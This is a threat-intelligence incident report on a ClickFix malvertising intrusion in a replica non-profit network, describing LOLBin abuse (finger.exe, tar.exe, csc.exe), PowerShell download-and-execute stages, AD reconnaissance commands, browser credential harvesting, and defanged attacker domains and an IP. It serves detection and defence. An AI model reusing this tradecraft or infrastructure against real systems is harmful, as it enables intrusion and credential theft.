Full Report
During a 12-day Deception.Pro operation, researchers observed a high-severity, multi-stage intrusion chain that began with malvertising and a ClickFix-style fake CAPTCHA. The lure instructed the victim to paste an obfuscated command into the Windows Run dialog. That single action spawned nested cmd.exe execution, tested outbound connectivity using finger.exe (TCP/79), and pulled a masqueraded “PDF” from attacker infrastructure. The downloaded file was not a normal document; it behaved like a compressed archive and was extracted locally using built-in Windows tooling. From there, the actor executed multiple PowerShell download-and-execute stages (IEX) from attacker-controlled domains, dynamically compiled .NET payloads using csc.exe from user temp directories, and deployed Python-based components under C:\ProgramData for persistence. Follow-on activity included Active Directory reconnaissance (domain trusts, server discovery, user listing) and attempted browser credential harvesting via a PowerShell script downloaded from 143.198.160[.]37.
Analysis Summary
# Incident Report: Velvet Tempest ClickFix to Termite Ransomware Precursor
## Executive Summary
Between February 3 and February 16, 2026, researchers monitored a 12-day multi-stage intrusion targeting a non-profit organization’s Active Directory environment. The attack utilized "ClickFix" malvertising to trick users into executing obfuscated commands, leading to the deployment of loaders, CastleRAT, and extensive hands-on-keyboard reconnaissance. The activity is attributed to **Velvet Tempest (DEV-0504)** and is identified as a precursor to **Termite Ransomware** deployment.
## Incident Details
- **Discovery Date:** February 3, 2026
- **Incident Date:** February 3 – February 16, 2026
- **Affected Organization:** AI-generated replica (Non-profit Aid Organization)
- **Sector:** Non-Profit / Humanitarian Tech
- **Geography:** United States
## Timeline of Events
### Initial Access
- **Date/Time:** 2026-02-03 17:38:57
- **Vector:** Malvertising / ClickFix Social Engineering
- **Details:** A victim was prompted by a fake CAPTCHA to "verify they are human" by pasting an obfuscated command into the Windows Run dialog. This executed a command connecting to `finger[.]h3securecloud[.]com`.
### Lateral Movement & Reconnaissance
- **Reconnaissance:** Actors used `nltest /domain_trusts`, `net user /domain`, and `get-psdrive` to map the Active Directory environment.
- **Payload Staging:** The actor moved from initial loaders to DonutLoader and CastleRAT, compiling .NET payloads on-the-fly using `csc.exe`.
### Data Exfiltration/Impact
- **Impact:** Attempted credential harvesting from Google Chrome via a PowerShell script (`chrome_pass.txt`).
- **Ransomware Precursor:** While no encryption occurred during the 12-day window, the activity mirrors known Termite Ransomware staging patterns.
### Detection & Response
- **Detection:** Identified via Deception.Pro monitoring of a replica environment.
- **Response Actions:** Observation of attacker tradecraft for intelligence gathering; identification of previously unknown C2 infrastructure and file hashes.
## Attack Methodology
- **Initial Access:** ClickFix (Social Engineering + Windows Run dialog).
- **Persistence:** Python-based components deployed under `C:\ProgramData` and CastleRAT foothold.
- **Privilege Escalation:** Not explicitly detailed, but involved AD domain admin reconnaissance.
- **Defense Evasion:** Use of LOLBins (`finger.exe`, `curl.exe`, `tar.exe`), masquerading archives as `.pdf` files, and on-host compilation via `csc.exe` to avoid signature-based detection.
- **Credential Access:** Browser credential harvesting via PowerShell script (Invoke-PowerChrome-like functionality).
- **Discovery:** AD trust discovery, user listing, and server discovery.
- **Lateral Movement:** Hands-on-keyboard (HoK) interaction and staging for wider deployment.
- **Collection:** Automated gathering of browser-stored credentials.
- **Exfiltration:** Potential C2 channels via `.life` and `.org` domains.
- **Impact:** Intelligence suggests a final stage of Termite Ransomware.
## Impact Assessment
- **Financial:** High potential (Ransomware risk); actual cost minimized by deception environment.
- **Data Breach:** Attempted theft of browser credentials across the environment.
- **Operational:** Threat to 3,000+ endpoints and 2,500+ users.
- **Reputational:** High risk for a non-profit handling sensitive aid distribution data.
## Indicators of Compromise
- **Network Indicators:**
- `h3securecloud[.]com`
- `vrstudio[.]life`
- `gamestudio[.]life`
- `grtrip[.]org`
- `143.198.160[.]37`
- **File Indicators:**
- `chrome_pass.txt`
- `volccpfs.cmdline`
- `__init__.py` (in `C:\ProgramData\AndronFolder\`)
- **Behavioral Indicators:**
- Outbound traffic on TCP/79 (`finger.exe`).
- Unexpected `csc.exe` execution in user `Temp` directories.
- `tar.exe` extracting masqueraded `.pdf` files.
## Response Actions
- **Containment:** Blocked associated attacker domains and IP addresses.
- **Eradication:** Removal of Python scripts and .NET artifacts from `C:\ProgramData` and `Temp` folders.
- **Recovery:** Identification of all endpoints interacting with the ClickFix lures for credential resets.
## Lessons Learned
- **The "Human" Factor:** Attackers are bypassing browser security by moving social engineering lures to the Windows Run dialog (copy/paste), which evades many web protectors.
- **LOLBins:** Traditional security monitoring often ignores native tools like `finger.exe` or `tar.exe`, which were central to this stage-1 retrieval.
- **Staging Speed:** The transition from initial click to hands-on-keyboard reconnaissance was rapid, highlighting the need for fast automated response.
## Recommendations
- **Restrict LOLBins:** Implement AppLocker or Windows Defender Application Control (WDAC) to block or log high-risk binaries like `finger.exe` and `csc.exe` for standard users.
- **User Training:** Specifically warn users against "Copy-Paste" lures from websites asking them to use the Windows Run (`Win+R`) box.
- **Monitor Temp Directories:** Alert on the creation of `.cmdline` files or execution of `csc.exe` originating from `%TEMP%` subfolders.